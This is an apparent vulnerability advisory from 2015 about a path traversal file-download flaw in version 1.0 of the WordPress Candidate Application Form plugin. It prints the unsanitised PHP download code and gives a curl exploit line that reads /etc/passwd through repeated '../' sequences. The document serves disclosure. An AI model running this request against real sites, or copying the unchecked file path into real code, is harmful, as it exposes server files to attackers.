WordPress Candidate Application Form 1.0 File Download

`Title: Remote file download vulnerability in candidate-application-form v1.0 wordpress plugin  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-07-12  
Download Site: https://wordpress.org/plugins/candidate-application-form  
Vendor: https://profiles.wordpress.org/flaxlandsconsulting/  
Vendor Notified: 2015-07-12  
Vendor Contact:  
Description: This plugin allows you to easily add a candidate application form to a job vacancy post, which allows the candidate to apply for the vacancy.  
Vulnerability:  
The code in downloadpdffile.php doesn't do any sanity checks, allowing a remote attacker to download sensitive system files:  
  
<?php  
2 $file_name = $_GET["fileName"];  
3 $path = $_GET["fileUrl"];  
4 $fullfile = $path.$file_name;  
5 if (file_exists('../../uploads/candidate_application_form/'.$file_name)) {  
6 header('Pragma: public'); // required  
7 header('Expires: 0'); // no cache  
8 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');  
9 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ('../../uploads/candidate_application_form/'.$file_ name)).' GMT');  
10 header('Cache-Control: private',false);  
11 header('Content-Type: '.'application/pdf');  
12 header('Content-Disposition: attachment; filename="'.basename('../../uploads/candidate_application_form/'.$file_ name).'"');  
13 header('Content-Transfer-Encoding: binary');  
14 header('Content-Length: '.filesize('../../uploads/candidate_application_form/'.$file_name)); // provide file size  
15 header('Connection: close');  
16 readfile('../../uploads/candidate_application_form/'.$file_name); // push it out  
17 exit();  
18 }  
  
CVEID:  
OSVDB:  
Exploit Code:  
• $ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd  
•   
`